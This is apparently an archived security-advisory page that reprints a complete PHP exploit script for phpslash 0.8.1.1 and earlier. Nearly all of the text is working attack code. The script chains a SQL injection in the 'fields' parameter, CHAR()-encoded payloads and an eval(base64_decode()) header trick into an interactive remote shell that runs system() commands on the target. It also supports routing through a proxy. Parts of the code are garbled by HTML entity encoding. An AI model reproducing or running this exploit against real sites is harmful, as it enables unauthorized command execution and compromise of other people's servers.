phpslash <= 0.8.1.1 Remote Code Execution Exploit

2009-02-05T00:00:00
ID SECURITYVULNS:DOC:21293
Type securityvulns
Reporter Securityvulns
Modified 2009-02-05T00:00:00

Description

!/usr/bin/php -q

<?php

This file requires the PhpSploit class.

If you want to use this class, the latest

version can be downloaded from acid-root.new.fr.

phpslash <= 0.8.1.1 Remote Code Execution Exploit

- - - - - - - - - - - - - - - - - - - - - - - - -

RCE with no special rights (guest).

No special PHP conditions required.

- - - - - - - - - - - - - - - - - - - - - - - - -

#0 It was a private sploit, but I decided to publish

it #1 You did the fag on that one bro, it will not happen

again =). #2 Don't try to use it on hzv, I helped them

to patch this one before I publish it =)

- - - - - - - - - - - - - - - - - - - - - - - - -

Exploitation steps:

1 - include/class/tz_functions.inc tz_strftime()

2 - include/class/tz_functions.inc tz_generic()

3 - include/tz_env.class generic()

error_reporting( E_ALL ^ E_NOTICE ); require('phpsploitclass.php');

// Main function function main() { // :) $web = new phpsploit(); $web->agent( 'Mozilla Firefox' );

    // Hey ya :&#41;
    head&#40;&#41;;

    // Target
    $url = get_p&#40; &#39;url&#39;, true &#41;;

    // Proxy options
    $prh = get_p&#40; &#39;proxhost&#39; &#41;;
    $pra = get_p&#40; &#39;proxauth&#39; &#41;;

    // Use a proxy ?
    if&#40; $prh &#41;
    {
            // host:ip
            $web-&gt;proxy&#40; $prh &#41;;

            // Authentication
            if&#40; $pra &#41;
            $web-&gt;proxyauth&#40; $pra &#41;;
    }

    // Single quote bypass
    $byp = &quot;1&#39;&#41;;&quot;;

    // PHP code
    $php = &#39;eval&#40;base64_decode&#40;$_SERVER[HTTP_MYPCODE]&#41;&#41;;&#39;;

    // Separator
    $s_sep = md5&#40; rand&#40; 0, 1000000000 &#41; . &#39;HEY_YA&#39; &#41;;
    $c_sep = &quot;print&#40;&#39;$s_sep&#39;&#41;;&quot;;

    // Final PHP code
    $final = $byp . $c_sep  . $php . $c_sep  . &#39;exit&#40;&#41;;//&#39;;

    // Welcome guess !
    while&#40; &#40;$cmd = cmd_prompt&#40;&#41;&#41; !== false &#41;
    {
            // magic_quotes_gpc bypass
            $web-&gt;addheader&#40; &#39;MypCode&#39;, base64_encode&#40; &#39;system&#40;&quot;&#39; . add_slashes&#40;$cmd&#41; . &#39;&quot;&#41;;&#39; &#41; &#41;;

            // Go =]
            $web-&gt;get&#40; $url . &#39;index.php?fields=&#39; . to_char&#40; $final &#41; . &#39;,1&#39; &#41;;

            // Result
            $res = explode&#40; $s_sep, $web-&gt;getcontent&#40;&#41; &#41;;

            // Erf 
            if&#40; !isset&#40; $res[1] &#41; &#41;
            {
                    print &quot;&#92;nFailed&quot;;
                    exit&#40;1&#41;;
            }
            // Cool
            else
            {
                    if&#40; empty&#40; $res[1] &#41; &#41;
                    print &quot;&#92;nNo output: system&#40;&#41; disabled OR cmd failed OR cmd without output&quot;;

                    else
                    print &quot;&#92;n&quot; . $res[1];
            }
    }

    return;

}

// No more bug with " and $ function add_slashes( $str ) { return str_replace( '$', '\\$', addslashes( $str ) ); }

// Command prompt function cmd_prompt() { print "\nshell>";

    $cmd = trim&#40; fgets&#40; STDIN &#41; &#41;;

    // Wanna stop =&#40; ?
    if&#40; in_array&#40; strtolower&#40; $cmd &#41; , array&#40; &#39;exit&#39;, &#39;quit&#39; &#41; &#41; &#41;
    return false;

    else 
    return $cmd;

}

// MySQL CHAR() encoding function to_char( $data ) { $chars = 'CHAR('; $len = strlen( $data );

    for&#40; $i = 0; $i &lt; $len; $i++ &#41;
    {
            $chars .= ord&#40; $data[ $i ] &#41;;

            if&#40; $i != $len-1 &#41;
            $chars .= &#39;,&#39;;
    }

    return $chars . &#39;&#41;&#39;;

}

// CLI params function get_p( $p, $exit = false ) { foreach( $_SERVER['argv'] as $key => $value ) { if( $value === '-' . $p ) { if( isset( $_SERVER['argv'][ $key+1 ] ) && !empty( $_SERVER['argv'][ $key+1 ] ) ) {
return $_SERVER['argv'][ $key+1 ]; } else { if( $exit ) usage();

                            return true;
                    }
            }
    }

    if&#40; $exit &#41;
    usage&#40;&#41;;

    return false;

}

// Headers =) function head() { print "\nphpslash <= 0.8.1.1 Remote Code Execution Exploit\n"; print "-------------------------------------------------\n\n"; print " About: \n"; print " by DarkFig < gmdarkfig (at) gmail (dot) com >\n"; print " http://acid-root.new.fr/\n"; print " #acidroot@irc.worldnet.net\n\n";

    return;

}

// Usage, can help.. function usage() { print " Usage:\n"; print " php spl.php -url <website> [options]\n\n"; print " Example:\n"; print " php spl.php -url http://victim.com/\n\n"; print " Options:\n"; print " -proxhost <ip:port> if you wanna use a proxy\n"; print " -proxauth <usr:pwd> proxy with authentication\n";

    exit&#40;0&#41;;

}

// Run baby main();

?>